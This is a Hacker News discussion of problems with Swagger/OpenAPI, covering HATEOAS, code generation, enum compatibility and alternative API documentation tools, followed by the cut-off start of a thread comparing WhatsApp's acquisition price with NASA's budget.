I agree that HATEOAS is never deployed anywhere, but I think I'd go further
than that.
It's impossible for me to see how it would be possible to write a HATEOAS
client, and I can't in practice see anyone doing so.
Optimizing for HATEOAS seems to me to be optimizing for entirely the wrong
metrics, and a complete waste of development time and effort.
~~~
querulous
every web browser you use is a hateoas client
you get some html with embedded links and then the browser automatically goes
and fetches css, js, images...
the remaining links it just presents to you, the user, to follow or not as you
choose
hateoas is not a complicated idea. it's not meant to replace SOAP or gRPC or
thrift. it's something else
~~~
ajross
Except the browser really isn't. It has strict behavior, and the list of what
happens as it loads that hypermedia is deterministic and known to both the
client and server. The difference between what happens when the browser sees a
"stylesheet" link reference and a "icon" one is significant, and not something
the browser is expected to figure out on its own.
The HATEOAS idea is that you throw that out, just use some arbitrary XML
(sorry, "hypermedia") to return your application state, and that this somehow
magically empowers the client to be able to puzzle out all the things that can
be done to your state.
Except it can't. It's just arbitrary junk if you don't have a schema and a
spec. And it will always be so. Discoverability is (1) not something you can
get from a data structure and (2) something best provided by documentation,
not runtime behavior.
~~~
icebraining
I think you have a completely wrong idea about HATEOAS. The application is
certainly expected to be able to handle the data format, not figure out by
magic. As Fielding writes in his dissertation, _REST components communicate by
transferring a representation of a resource in a format matching one of an
evolving set of standard data types_. The client is certainly supposed to
understand these data types, that's why they must be standard (like HTML). The
dynamic part comes from the formats themselves, which may have variable or
optional elements depending on the state of the resource.
~~~
ajross
Someone needs to fix the wikipedia page on HATEOAS then, because it says
exactly the opposite of what you just did in its third sentence.
(One of the other problems with Fielding's work is precisely this word-salad
of new jargon and usages, leading to exactly this kind of what-does-it-REALLY-
mean-anyway confusion. But that's an argument for a different thread.)
~~~
icebraining
From the wikipedia page: _" The media types used for these representations,
and the link relations they may contain, are standardized."_
As for Fielding's work having a word-salad of new jargon and uses, I frankly
didn't get that by reading his dissertation, which I found quite clear. There
are a few concepts (Resources, Representations), but I think they make sense
in the context.
------
int_19h
TL;DR version:
The first problem is that Swagger encourages codegen, and in static languages,
said codegen is often unnecessarily restrictive when parsing input data.
Adding a new enum member, and what that does to an existing Java client (that
maps it to Java enum, which now has a missing member), is given as an example.
The second and third problems are actually one and the same, and that is that
Swagger doesn't do Hypermedia. If you don't know what that and HATEOAS is,
this entire part is irrelevant to you. If you do know, and you believe it's a
fad, then you wouldn't agree with any points in that complaint. If you do know
and like it, then you already know what it is about (it's basically just
rehashing the usual "why HATEOAS is the only proper way to do REST" narrative,
with Swagger as an example).
The last problem is that if you do API first (rather than YAML first), it's
overly verbose, and can potentially leak implementation details into your
spec.
~~~
jayd16
At its core, the complaint is just sour grapes from not planning ahead. You
wrote the API with the guarantee of an enum, and then broke the gurantee and
expected all the code relying on that guarantee to be fine. It doesn't work
that way.
~~~
int_19h
Not quite; the point it's trying to make is that having an enum is not
necessarily a guarantee that no new members will be added in the future, or at
least it shouldn't be.
I think it's half-right, in a sense that this is true for enums that are used
for input values only. If the API adds a new enum value, it can also add
handling for that value, so existing clients should just work (they just never
use that new value). But if the enum is present in any output data, then
adding a new value to it is a contract break, because existing clients can see
it, and they don't know what they're supposed to do with it.
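The input-side tolerance described above can be sketched in a few lines (the enum and its values are hypothetical, not from any real Swagger codegen): the client maps any wire value it doesn't recognize to a catch-all member instead of raising.

```python
from enum import Enum

class OrderStatus(Enum):
    """The order states this client version was generated against."""
    PENDING = "pending"
    SHIPPED = "shipped"
    UNKNOWN = "unknown"  # catch-all for values the server adds later

    @classmethod
    def parse(cls, raw: str) -> "OrderStatus":
        # Tolerant reader: an unrecognized wire value maps to UNKNOWN
        # instead of raising, so a new server-side member does not
        # crash existing clients during deserialization.
        try:
            return cls(raw)
        except ValueError:
            return cls.UNKNOWN
```

For output data the caller still has to decide what UNKNOWN means in context, which is exactly the contract question raised above.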
------
misterbowfinger
This seems more like, "issues with how Swagger is used in Java". A lot of Java
developers are used to the SOAP APIs of yesteryear, and thus try to create
clients with Swagger when they should be using gRPC or Thrift.
In other language paradigms, I haven't faced this issue. Swagger is _just_
documentation, and a nice front-end on top. The Java annotations definitely
make it easy to generate, though, I'll give it that.
~~~
cookiecaper
Thrift and protobufs are underappreciated. Better integration in something
similar to the Swagger Editor would give these a much more comfortable home
and allow them to see adoption in the web world, where people generally expect
things to be a little softer.
I've never really liked the REST paradigm, so I'd be pleased to see it die.
My biggest complaint with Thrift: they still make you do some convoluted hacks
to get a two-way ("streaming") connection in the RPC, and when this is
discussed, they usually kibosh it pretty quickly by saying it's an unsupported
case and that you can find some hacks online, but they don't want to talk
about it any further.
This may not have been a big problem for them before gRPC was released for
protobufs, but it's definitely something that's worthy of attention and
response now. I know lots of people who are going with protobufs instead
because of this.
The other thing is that while Thrift boasts a lot of language compatibility,
several of these are buggy.
~~~
jessaustin
_I 've never really liked the REST paradigm, so I'd be pleased to see it die._
Don't hold your breath. Fielding's thesis is already 17 years old, so one
would expect its philosophy to endure by the Lindy Effect if for no other
reason.
~~~
cookiecaper
If the "Lindy Effect" was a natural law and not simply a shorthand to refer to
enduring popularity, nothing would ever die out; its lifetime would
continually double. Wikipedia notes this: _Because life expectancy is
probabilistically derived, a thing may become extinct before its "expected"
survival. In other words, one needs to gauge both the age and "health" of the
thing to determine continued survival._
There are lots of things in tech that we just stop doing one day. They get
replaced by a different hot new thing. I'm sure REST will not go extinct for a
very long time, but it definitely _could_ go cold, just like its popular
predecessors.
~~~
emmelaich
Perhaps REST as the thing you do over http with http verbs won't be around.
But the architectural principle called REST will be around forever because
it's essentially the same thing as functional programming.
That REST is cache friendly corresponds exactly to the way that pure functions
are memo-ising friendly.
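The parallel can be made concrete with a toy sketch (not anyone's production code): a function whose result depends only on its argument can be memoised for the same reason a response keyed by URI can be cached.

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def get_representation(uri: str) -> str:
    # Pure with respect to its argument: same URI, same result --
    # the property that makes both memoisation and HTTP caching of
    # safe, idempotent GETs valid.
    return f"representation of {uri}"
```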
------
dandlift
In my team we established a process where our first step is to write down the
spec of the API, in swagger format.
The spec is the source of truth, and is written manually in YAML (that's not
that painful). The implementation comes later. Unit tests check that it
conforms to the spec. [1] We also have a fake API, almost completely
autogenerated from the spec, that's quite useful for preliminary testing of
the clients.
Client code generation wasn't up to my expectations, but I've experimented
with applying a handwritten template to a parsed spec and that seems viable.
Swagger as a format might have its quirks, but the tooling is there, and
having it as the authoritative source of truth has paid off for us.
[1] [https://bitbucket.org/atlassian/swagger-request-
validator](https://bitbucket.org/atlassian/swagger-request-validator)
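A spec-first workflow like the one above starts from a small hand-written document. As a hypothetical illustration (service and field names invented), a minimal Swagger 2.0 fragment for a single resource looks like:

```yaml
swagger: "2.0"
info:
  title: Orders API          # hypothetical example service
  version: "1.0"
paths:
  /orders/{id}:
    get:
      parameters:
        - name: id
          in: path
          required: true
          type: string
      responses:
        "200":
          description: The requested order
          schema:
            $ref: "#/definitions/Order"
definitions:
  Order:
    type: object
    properties:
      id:
        type: string
      status:
        type: string
```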
------
badreaction
We use swagger heavily and I can say the following:
1) We use the tolerant reader pattern. It is entirely possible to generate
tolerant client code where adding a new enum element does not cause issues.
The problem here is not swagger but poor code gen.
2) We use hypermedia in all of our APIs extensively; I don't see how this is
impacted by swagger. Hypermedia is a runtime discovery mechanism, so other
than declaring the link structures in your schema, it has no place in swagger.
We don't use HAL, and wouldn't recommend it either.
~~~
daenney
Totally agree on the codegen bits.
> To mitigate this problem just stop generating code and doing automatic
> deserialisation. Sadly, I have observed that’s a very hard habit to break.
That conclusion really irks me. In Java, if you're using AutoMatter for
example, you're one annotation away from discarding unknown fields and many
other serialisation frameworks offer the same ability. It's not a default
(which imho it should be) but it's trivial to fix.
------
throwaway2016a
I'm surprised RAML isn't suggested as an alternative.
[http://raml.org/](http://raml.org/)
~~~
misterbowfinger
Does it address the issues in the post?
~~~
jstoiko
The RAML 1.0 type system can help:
[http://adrobisch.github.io/blog/articles/hateoas-with-
raml-1...](http://adrobisch.github.io/blog/articles/hateoas-with-raml-10.html)
------
bluejekyll
> To mitigate this problem just stop generating code and doing automatic
> deserialisation.
No! WTF?! Just use generators that produce code that is resilient to a
changing API. Why would you get rid of a huge productivity boost because the
generator doesn't produce code you like? That's trading two hours of work to
change the generator, for many multiple hours of reproducing the proper API,
especially if you have many to support.
I stopped reading right there. My personal biggest issue with swagger is that
they threw the baby out with the bath water, reproducing XSD in Yaml, for no
good reason. The UI they produced was nice, and that is probably the best
feature of swagger. But the data format doesn't solve a new problem IMO, it
just created a new standard that we all have to deal with.
What is that now? Corba IDL, XSD, protobuf, thrift, avro, Swagger, Raml... I'm
sure because of the flaws in each of those, we really should just use the new
OpenAPI.
Or just get rid of them all and go bare metal with Cap'n Proto. Oh but don't
use code generators for any of those, because that would make it way too easy
to support all of them with a single API </sarcasm>.
------
prodikl
> The rest of the URIs are provided by Hypermedia.
I know this sounds awesome but in practice, it's really useful to have my
swagger UI exposing the endpoints for our front-end developers to consume.
What a pain it'd be for me to tell them "hit / and see what you get!"
Having HAL links between resources is great and this discovery aspect of
HATEOAS makes a lot of sense in development. But having a single entrypoint
"homepage" to the API, when it comes to swagger, doesn't make sense.
I ran into this when I asked another department for the endpoint to hit for
certain data. I was given a swagger page with a bunch of "/status" endpoints
that would then reveal additional endpoints. Who knows what rabbit hole I was
sent down. I just needed the endpoint and the necessary parameters.
If I were a third party or some outside developer consuming the API, it kind
of makes sense. But our internal swagger docs really should reveal endpoints.
I would feel like a big asshole if I asked my front-end co-worker to just "hit
/status" and see if you get what you need!
Disclosure: I don't use Swagger codegen. I only use the Docblock markup to
document my API and generate the swagger.json that I display on our docs page.
------
daliwali
An alternative is to just ditch these complicated documentation formats
altogether. Put down your pitchforks, I'll explain.
The author of REST, Roy Fielding, stated that only the entry URL and media type
should be necessary to know in advance. Swagger would be considered out-of-
band information, if it's necessary to have this documentation beforehand then
it doesn't follow this constraint. Interactions must be driven by hypermedia,
an idea which has a very unmarketable acronym.
The alternative that is suggested is to _document media types, not APIs_. If
HTML were not a standard and every web page had to define its own technical
specifications, the web wouldn't have taken off, because it wouldn't have been
interoperable. Interoperability is key, it reduces friction from transitioning
between web pages on different servers. How HTTP APIs are built today is
wasteful, there are vendor-specific tooling costs up front and it doesn't
scale.
~~~
jshen
What is an example of a well done API that functions the way you describe?
------
ogrim
I would never write Swagger by hand; why should I when I can have it
generated? We are using Swashbuckle[0] to generate Swagger for our ASP.NET Web
API, which has been a great experience. We can explore and test the API in
Swagger UI. I have been sprinkling a bit of hypermedia on top of this with
HAL, mainly just for having links. I have never met anyone wanting to go the
full HATEOAS route, but simple links can go a long way. Swagger UI has been
great for this, as HAL alone isn't really expressive enough to document what a
link means. On the consumer side, I have been using NSwag[1] to generate
clients with good results.
[0]
[https://github.com/domaindrivendev/Swashbuckle](https://github.com/domaindrivendev/Swashbuckle)
[1] [https://github.com/NSwag/NSwag](https://github.com/NSwag/NSwag)
~~~
eddieroger
> why should I when I can have it generated?
Because maybe you work on a team where half are creating an API and half are
creating a client, and if you write a Swagger spec first, you can both be
working at the same time, against the same contract, and just meet in the
middle? And if you're working on the consumer side of things, you can take
that spec and stand it up against a mocking engine that will now give you
something to test against while your API team finishes their work? Just
because you would rather generate Swagger doesn't mean there's not a reason to
write it by hand before writing code.
~~~
ogrim
One can still do what you are describing and have the Swagger spec generated.
On my platform, I would just specify data types and the interfaces, and have
Swashbuckle parse this and spit out the Swagger spec. No need to hand-code
Swagger while creating the contract up front. After this step, one could work
at both sides of the contract independently as you describe.
------
Touche
So many problems in programming are caused by trying to replace code with
configuration. I've learned over time that the DRY principle can be harmful.
Avoiding repetition is only good when it remains equally readable and
powerful.
Defining a DSL is almost always a better idea (but more difficult) than
defining a configuration format.
~~~
carapace
What is the difference between a DSL and a configuration format?
I mean the _essential_ difference. ;-)
------
beders
People often don't make a crucial distinction: are you developing an API that
happens to be accessible via HTTP, or are you developing a Web Service?
For an API where you control both the server and the client, you don't need to
use REST.
For a Web Service, where you don't control which clients are using, you are
better off with a RESTful implementation supporting hypermedia. Especially if
you are interested in keeping clients happy and not give them the middle-
finger shaped like a incompatible-v2 version of your service.
------
api
API Blueprint is much, much cleaner:
[https://apiblueprint.org](https://apiblueprint.org)
Here's a renderer:
[https://github.com/danielgtaylor/aglio](https://github.com/danielgtaylor/aglio)
It's less feature-rich than Swagger but the format is much less of a
nightmare.
------
banachtarski
I stopped reading after the author's silly interpretation of enums and why
they "weren't" useful. The rantings of a beginner don't make for a good
critique.
------
carapace
I read "YAML, which I call XML for lazy people"... and closed the tab.
~~~
borplk
why?
------
Vinnl
So here's something I've never quite understood when reading about HATEOAS:
> Without hypermedia, the clients would probably have to parse the payload to
> see if there are some kind of status and then evaluate that status to take a
> decision whether the order may or not be canceled.
In the given example, wouldn't the client still need to check whether there
actually is a `cancel` link (and know that it _can_ be there), and decide
whether or not to call it? In other words, isn't it unavoidable that there's
business logic in the clients?
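The question above can be answered with a small sketch (the HAL-style payload is a hypothetical example, not from the article): yes, the client still has to know the `cancel` relation exists and what following it means, but the decision of *when* it applies stays on the server.

```python
def can_cancel(resource: dict) -> bool:
    # The client knows the "cancel" link relation; whether it is
    # offered at all is decided server-side, so that business rule
    # can change without touching client code.
    return "cancel" in resource.get("_links", {})

# HAL-style representation of an order that may still be cancelled.
order = {
    "id": "42",
    "status": "processing",
    "_links": {
        "self": {"href": "/orders/42"},
        "cancel": {"href": "/orders/42/cancel"},  # omitted once shipped
    },
}
```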
------
buremba
"..swagger repeats itself a lot with redundant annotations, it also leads to
having more annotations than actual code."
(Shameless plug) For this exact problem, we developed a Java library that
makes it easy to create RESTful services and is highly integrated with Swagger.
Here it is: [https://github.com/buremba/netty-
rest](https://github.com/buremba/netty-rest)
We also tried hard to stick with Swagger-codegen, but it's far from stable, so
eventually we ended up creating a Slate documentation that demonstrates the
usage of the API with high-level HTTP libraries for various programming
languages.
We convert the Swagger spec to a HAR representation, create the example usage
of the endpoint with httpsnippet from the HAR
([https://www.npmjs.com/package/httpsnippet](https://www.npmjs.com/package/httpsnippet))
and embed it in our Slate documentation using our Slate documentation
generator. ([https://github.com/buremba/swagger-
slate](https://github.com/buremba/swagger-slate))
Here is an example: [http://api.rakam.io/](http://api.rakam.io/)
------
hodgesrm
> The original problem swagger tries to solve is: API documentation. So, if
> you need to document an API, use a format that is created for that purpose.
> I highly recommend using Asciidoctor for writing documentation. There are
> some tools for Java that help you with this. However they are somehow
> technology specific. For instance Spring REST Docs works very well if you
> are using Spring / Spring Boot.
I have used Asciidoctor + Spring REST Doc to document a complex REST API and
my experience was almost completely the opposite, for a number of reasons.
1.) Asciidoctor is powerful but exceedingly tedious to edit. It's especially
painful to use for documenting an API in advance--wikis like Confluence are
far easier to use and also allow commenting.
2.) Spring REST Doc generates snippets of asciidoc text that you must
laboriously incorporate into the parent asciidoc. It's particularly painful when
combined with maven (another source of pain for some of us). Anybody who has
asked the question "where do I look in target to find my output?" as well as
"now that I found the output how do I make it go somewhere else instead?"
knows what I mean.
3.) The unit tests that Spring REST Doc depends on to generate output are hard
to maintain for anything beyond trivial cases. I've spent countless hours
debugging obscure bugs caused by Spring IoC problems. Also, the DSL format
used to define output of examples is hard to understand--just getting URLs to
show https schemes and paths takes time.
Finally, I would disagree that Swagger is purely designed to document existing
REST interfaces. We're using it to design the interfaces in advance. It's not
perfect but works better than other tools I have found let alone informal
specification via a wiki. Spring REST Doc is close to useless for design.
------
pibi
It looks like the perfect workaround is to use some middleware to autogenerate
the Swagger docs, at least to keep code and documentation in sync. After a
while I found myself doing the opposite, using Swagger to autoconfigure
endpoints ([https://github.com/krakenjs/swaggerize-
express](https://github.com/krakenjs/swaggerize-express)) and even mongodb
models ([https://github.com/pblabs/swaggering-
mongoose](https://github.com/pblabs/swaggering-mongoose)). Here is my actual
reference architecture: [https://github.com/pibi/swagger-rest-api-
server](https://github.com/pibi/swagger-rest-api-server)
Best thing about this approach is the clean separation between API definitions
and the implementation (all over the stack), so the teams can just discuss
about how to organize the resources and how to use them.
------
dqv
Here is a cached version as the site is currently giving me an HTTP 500:
[http://webcache.googleusercontent.com/search?q=cache:uQABqVC...](http://webcache.googleusercontent.com/search?q=cache:uQABqVCV2b0J:blog.novatec-
gmbh.de/the-problems-with-swagger/+&cd=1&hl=en&ct=clnk&gl=us)
------
maddening
To be honest I didn't know that Swagger could generate an API - still, I
wouldn't use anything that generates code from some description (the attempts
I've heard of didn't work out well in the past).
In projects I worked in Swagger was used to generate callable API from
existing implementation: add annotations (which are ugly :/, especially in
Scala, where such javaism hurts eyes even more), generate json, open it in
Swagger UI and let devs play with API.
What hurt me recently was the 3.0 release - basePath got broken, so I got
calls generated with a double slash (`host//api/call` etc.), and oauth2 is
completely broken so I cannot authenticate requests. 2.0 works with no issues,
though I find it sad that the vanilla version I downloaded uses a hardcoded
client_id and client_secret.
------
Jdam
My problem with Swagger is the Swagger editor. It just works sometimes, but
sometimes everything is just red for no reason. Tried with Safari, Chrome, Firefox
on different Macs. Am I the only one who thinks this tool is unusable?
Edit: Cheers to you guys at Novatec, I have to take a look at inspectIT again.
~~~
cookiecaper
It's definitely buggy. I've had more luck with it in Firefox than other
browsers. Refreshing and changing a line or two [usually] snaps it back into
shape.
Export your file frequently.
------
zip1234
I think Swagger is nice--codegen makes it simple to generate API clients for
various languages/frameworks. Saves a lot of time and potential sources of
errors. If there is something easier/better/more reliable, then I am all ears,
but Swagger keeps getting better.
------
tannhaeuser
Why are folks using Swagger or other tools for supposedly simple REST services
at all? It's not like Swagger is a "standard" or something, and from the
comments it appears using tooling for REST is a zero-sum game or even net
loss.
~~~
voycey
We started using it for its documentation and developer-console generation
ability at first. I have to say that I am much happier when I get given a
swagger definition for an API; it lets me generate a client pretty much
instantly, and as long as the definition is written well it more often than
not halves my integration time
~~~
tannhaeuser
I don't know if you're aware of the SOAP vs REST debate 10 years ago or Web
Services vs CORBA before that. Client generation, or any code generation at
all, was seen as a big no-no in the REST camp, so I find it ironic that today
this is used as Swagger et. al.'s saving grace. What I frequently see is that
inherently action-oriented protocols are crammed into resource-oriented REST
facades, only without any formal interface descriptions at all, and without
formal transactional or authorization semantics. OTOH, JSON REST services
can't be used without browser-side glue code at all so the Web mismatch
argument isn't working either. Makes you really wonder if there is any
rationality or progress in middleware usage at all.
------
glukki
Most developers use Swagger wrong. But this is the right approach:
[https://github.com/swagger-api/swagger-node/](https://github.com/swagger-
api/swagger-node/)
Swagger is a contract. From contract you can generate documentation, client,
input/output data validation, mock responses, integration tests, and something
else, I'm sure.
If you start development from swagger — you can get everything in sync. That
way you can't forget to update documentation, validation rules, tests, or
whatever you generate from swagger. That way you can do work once! No work
multiplication!
It makes development So Much Easier!
------
epiecs
I also looked at swagger but found it needlessly complex for my needs. I opted
for API Blueprint coupled with aglio to generate HTML docs, and also provided
a nicely prepped Postman collection including testing :)
------
tomelders
I think Koa (or Express) are the best tools for developing an API
spec/mock/doc that's useable and useful from the get go. You can have an
endpoint working in seconds, and it's easy to add all the different scenarios
you need. Dropping in middleware is easy too. And if you write your code well,
it's self documenting.
And ultimately, it's documentation for developers. I think it's as easy for a
non-js dev to parse and understand an endpoint controller than it is to parse
whatever freaky-deaky API documentation someone has cobbled together.
------
janslow
Whilst Swagger Codegen doesn't create perfect libraries and some of the
generators don't support all the features, once it's set up, it's just as easy
to create a client for every language as it is for just one.
For example, we create multiple client libraries, HTML documentation and a
partial server (so we don't have to manually write the parameter parsing and
models serializers).
Another advantage is you can start consuming the API as soon as the API design
is agreed, by using a generated mock server instead of waiting for the real
one to be implemented.
------
andreygrehov
In terms of API documentation, the biggest problem is making sure the
documentation is in sync with the actual code. I'm looking into using JSON
Schema [1] along with Swagger and Dredd [2]. Making it all language-agnostic
is key. If anyone is doing anything similar, please share your experience.
[1] [http://json-schema.org/](http://json-schema.org/)
[2]
[http://dredd.readthedocs.io/en/latest/](http://dredd.readthedocs.io/en/latest/)
~~~
abraae
We have hundreds of APIs, and we use RAML + json schema.
Since Swagger (OpenAPI) seems to be gaining ascendancy, I recently (some
months ago) looked at migrating off of RAML, but at that time the Swagger guys
had a philosophy that they would only support a subset of json schema.
I get their reasons - they want to be able to generate code. But the things
they didn't support (like oneOf - needed whenever you have a set of resources
of varying types) are a show stopper for many APIs with even moderately
complex payloads.
For us at least, its more important to have a single source of truth for our
APIs than to be able to generate code from the specs. Hence we remain on RAML
(which seems great - it just looks like it's losing the popularity contest).
~~~
vasusen
We also use RAML + json schema primarily as the single source of truth. We use
[https://jsonschema.net](https://jsonschema.net) to generate json schema by
providing it examples.
------
jerven
This is a bit off topic, but I feel that Swagger etc... and actually most API
docs are too human-centric. You can't auto-chain APIs together without a lot of
developer intervention. The one thing I saw that allowed that was SADI
services [1]. An awesomely pragmatic use of the semantic web. Pity it did not
get picked up by Google etc...
[1] [http://sadiframework.org/](http://sadiframework.org/)
------
andrewdb
I wish there were a way to easily generate a swagger spec from a Java project
as a build artifact out of the box, instead of having to serve the spec as a
dedicated API endpoint. There are some plugins, such as swagger-maven-plugin
[0], that do give you this functionality, though.
[0]: [https://github.com/kongchen/swagger-maven-
plugin](https://github.com/kongchen/swagger-maven-plugin)
------
akmanocha
Agreed with some but not all. In essence, anything can be abused. Swagger
being URI-centric is a well-documented, well-argued problem, and there is no
support for hypermedia either. Asciidoc and Spring REST Docs shine there.
But the annotations are not a problem, IMHO. Swagger also doesn't make things
more complex; they already are. Swagger also doesn't make reading docs
difficult as such, apart from the URI problem above.
Also, Spring REST Docs learned from the mistakes of Swagger, so it's a bit
unfair on Swagger.
------
ssijak
Check out Spring REST Docs [http://docs.spring.io/spring-
restdocs/docs/current/reference...](http://docs.spring.io/spring-
restdocs/docs/current/reference/html5/). Always up-to-date documentation,
which doubles as tests, supports HATEOAS, and more.
------
pushECX
For those that find it tedious to write swagger by hand, I've been using
Stoplight[1] at work and it's been working pretty well. You can create the
spec from scratch, or use their proxy to auto-document your api.
[1]: [https://stoplight.io/](https://stoplight.io/)
------
privacyfornow
I am working on auto generating clients with built in service subscription
based discovery, shock absorbers and circuit breakers based on open api
(swagger). We design our APIs with customer focus and therefore haven't run
into some of these problems so far.
------
a_imho
Problems with Swagger, it is really unfortunately named. I have never used
Swagger, to me it projects an aura that it is a quickly hacked weekend project
its authors did not put any effort to at least name properly. Yes, I know it
is irrational.
------
tschellenbach
Swagger is also a partial solution. I'd rather provide an API client library
and clearly document how to use the client library and not the underlying REST
API.
------
tootie
XSD is bulletproof. Why don't we just keep using XSD?
~~~
abraae
Because people don't want bullet proof. They want quick wins that work
straight away.
~~~
Mikhail_Edoshin
"For every complex problem there is an answer that is clear, simple, and
wrong." :)
------
tomc1985
One problem... it takes Swagger thirty-freakin-seconds to load its auto-
generated whatever for Magento Community, and it has to do this every freakin
time!
~~~
benmarks
That's... odd. Even running M2 off of DevBox on my Mac the swagger endpoint
renders in 5-10s (first visit).
------
kelnos
Oh, man. There is so much wrong with this article. Here we go:
> The documents are written in YAML, which I call XML for lazy people
No. That's ridiculous. XML (and JSON, for that matter) is designed to be read
and written by machines, not humans. (If the design goal was actually
primarily for humans to read and write it, the designers failed. Miserably.)
YAML is a nice middle ground, in that it can be unambiguously parsed by a
machine, but is also fairly pleasant and forgiving for humans to write.
> The enum thing
This is a problem with the code generators, not with Swagger as a spec. Any
API definition format that allows enums (and IMO, all should) will have this
"problem".
Language-native enums are way better to deal with than stringly-typed things.
An alternative might be to generate the enum with an extra "UNKNOWN" value
that can be used in the case that a new value is added on the server but the
client doesn't know about it.
However, I would consider adding a value to an enum to be a breaking API
change, regardless of how you look at it. What is client code expected to do
with an unknown value? In some cases it might be benign, and just ignoring the
unknown value is ok, but I'd think there are quite a few cases where not
handling a case would be bad.
I agree with the author that "adding a new element to the structure of the
payload should NEVER break your code", but that's not what adding an enum
value is. Adding a new element to the structure is like adding a brand-new
property on the response object that gives you more information. The client
should of course ignore properties it doesn't recognize, and a properly-
written codegen for a Swagger definition should do just that.
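A deserializer with that ignore-unknowns property is easy to sketch (the model below is a hypothetical example, not output of any Swagger codegen):

```python
from dataclasses import dataclass, fields

@dataclass
class Order:
    id: str
    status: str

def order_from_payload(payload: dict) -> Order:
    # Drop any key this client version does not know about, so a new
    # property in the response is additive rather than breaking.
    known = {f.name for f in fields(Order)}
    return Order(**{k: v for k, v in payload.items() if k in known})
```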
> Nobody reads the documentation anymore.
The author admits this issue isn't specific to Swagger, and yet harps on it
anyway. What?
> No Hypermedia support ... Which means, you can change that business logic
> whenever you want without having to change the clients... Swagger is URI
> Centric
Oh god. I don't care what Roy Fielding says. No one has embraced hypermedia.
It's irrelevant. Move on.
Being able to change biz logic has nothing to do with hypermedia. That's just
called "good design". That's the entire point of an API: to abstract business
logic and the implementation thereof from the client.
Regardless, the entire idea of being able to change your API without changing
the clients is just silly. If you're changing the API purely for cosmetic
reasons, just stop, and learn how to be a professional. If you're changing the
API's actual functionality or behavior, the code that _calls_ the client needs
to know what the new functionality or behavior is before it can make use of
it, or if it's even safe to make use of it. I imagine there are some small
number of cases where doing this "automatically" is actually safe, but the
incidences of it are so vanishingly small that it's not worth all the extra
complexity and overhead in designing and building a hypermedia API.
APIs are not consumed by "smart" clients that know how to recurse a directory
tree. They are consumed by humans who need to intelligently decide what API
endpoints they need to use to accomplish their goals. Being able to write a
dumb recursing client that is able to spit out a list of API endpoints
(perhaps with documentation) is a cute trick, but... why bother when you can
just post API docs on the web somewhere?
This section is irrelevant given my objections to the last section.
> YAML generation (default Java codegen uses annotations, codegen via this way
> will leak implementation details)
Well, duh, don't do it that way. Do API-first design, or at least write out
your YAML definition by hand after the fact. If nothing else, it's a good
exercise for you to validate that the API you've designed is sane and
consistent.
> Swagger makes a very good first impression
Yes, and for me, that impression has mostly remained intact as I continue to
work with it.
> What are the alternatives?
Having worked with both Spring and JAX-RS, I find it hard to take someone
seriously if they're strongly recommending it as a better alternative to
something as fantastic as Swagger. Also note that the author previously railed
on the reference impl Java tool for its reliance on annotations... which...
same deal with Spring and JAX-RS.
~~~
Mikhail_Edoshin
JSON follows JavaScript syntax, which is specifically meant to be written
manually, i.e. by humans. (This is one of the problems of JSON, by the way: look
at commas, for example, especially at the infamous problem of trailing commas
being illegal. This is definitely not meant to be written by machines.)
XML is indeed for machines, that is, the markup part of it. YAML may be more
readable, but note that the specification of YAML is about three times as
large as that of XML (and the XML specification also describes DTDs, a simple
grammar specification language). XML design goals are explicitly stated in its
specification, you're free to take a look.
~~~
gregopet
Any non-trivial format that's meant for humans MUST at the least allow
comments and should not force humans to write needless characters that would
be trivial for a machine to do without (e.g. quotes around key names). Also,
I'm flipping the bird to any format or language that doesn't allow me, a
human, to use multi-line strings. And in JSON I can't even at least
concatenate a few of them into a longer string. JSON is definitely not meant
to be written by humans.
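The strictness being complained about here is easy to demonstrate; a quick sketch using Python's standard `json` module (the sample documents are made up):

```python
import json

# Plain JSON parses fine.
doc = json.loads('{"name": "demo", "tags": ["a", "b"]}')
print(doc["name"])  # demo

def parses(text):
    """Return True if `text` is valid JSON."""
    try:
        json.loads(text)
        return True
    except json.JSONDecodeError:
        return False

# A trailing comma (legal in modern JavaScript) is rejected.
print(parses('{"tags": ["a", "b",]}'))        # False

# Comments are rejected too, which is what makes hand-editing painful.
print(parses('{"name": "demo"} // comment'))  # False

# And there is no way to concatenate string literals into a longer string.
print(parses('{"msg": "one" "two"}'))         # False
```

All three rejections are required by the JSON grammar itself, not quirks of this particular parser.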
------
mbesto
> The Problems with Swagger
> This is a Swagger misusage problem, not a problem from Swagger per se.
The TL;DR is a list of gotchas and best practices the author has learned from
using Swagger.
~~~
MyMan1
Almost.
| {
"pile_set_name": "HackerNews"
} |
Things that cost more than Space Exploration: WhatsApp. - DanielleMolloy
http://costsmorethanspace.tumblr.com/post/77364014273/what-costs-more-than-space-exploration-whatsapp
======
ajays
This post is next in the sequence of HN posts after a large exit: comparison
with NASA's budget, cost of trip to Mars, etc.
Typical sequence:
- news of the large exit, submitted repeatedly
- hastily written blogs about why it doesn't make sense
- hastily written blogs about why it makes sense
- cute stories about the company's past: founder(s) living on Ramen, etc.
- comparisons with NASA's budget, Mars exploration budget, Gates Foundation budget, etc.
- and finally, breathless "news" about the slightest change in the acquiree's ToS or some such silly news
~~~
adharmad
Also: What technology stack did the startup use to scale.
~~~
RafiqM
Well, that might be genuinely interesting and useful :)
------
taspeotis
For (what I feel is) a more useful figure, let's look at NASA:
> Annual budget ... when measured in real terms (adjusted for inflation), the
> figure is $790.0 billion, or an average of $15.818 billion per year over its
> fifty-year history. [1]
So WhatsApp is like 1.2 years worth of NASA.
[1]
[http://en.wikipedia.org/wiki/Budget_of_NASA](http://en.wikipedia.org/wiki/Budget_of_NASA)
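For what it's worth, the arithmetic behind "like 1.2 years" checks out; the $19 billion purchase price is an assumption here (widely reported, but not stated in this thread):

```python
whatsapp_deal_bn = 19.0    # widely reported Facebook purchase price, in $bn (assumption)
nasa_avg_year_bn = 15.818  # NASA's inflation-adjusted average annual budget, in $bn

# How many average NASA-years one WhatsApp buys.
years_of_nasa = whatsapp_deal_bn / nasa_avg_year_bn
print(round(years_of_nasa, 1))  # 1.2
```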
~~~
agentultra
I thought the article and the whole blog to be a rather fun and cheeky
counter-point to the argument that space exploration is too expensive.
As a total of US budget, NASA's expenses represented less than one half of one
percent in 2012.
We've spent more money on things other than space exploration that, depending
on who you ask, has far less social value.
~~~
maxerickson
It's possible to coherently argue against multiple types of spending.
Given the vagaries of Congress, arguing against any spending you don't like is
probably even a more sensible strategy than arguing first against the ones you
like the least.
------
tokenadult
On the other hand, considering that the surface of the moon has already been
visited by space probes carrying instruments and by manned spacecraft, while
many billions of possible combinations of human beings having conversations
here on earth have never happened, there is probably a lot more undiscovered
return on investment to be had from investing in WhatsApp than from investing
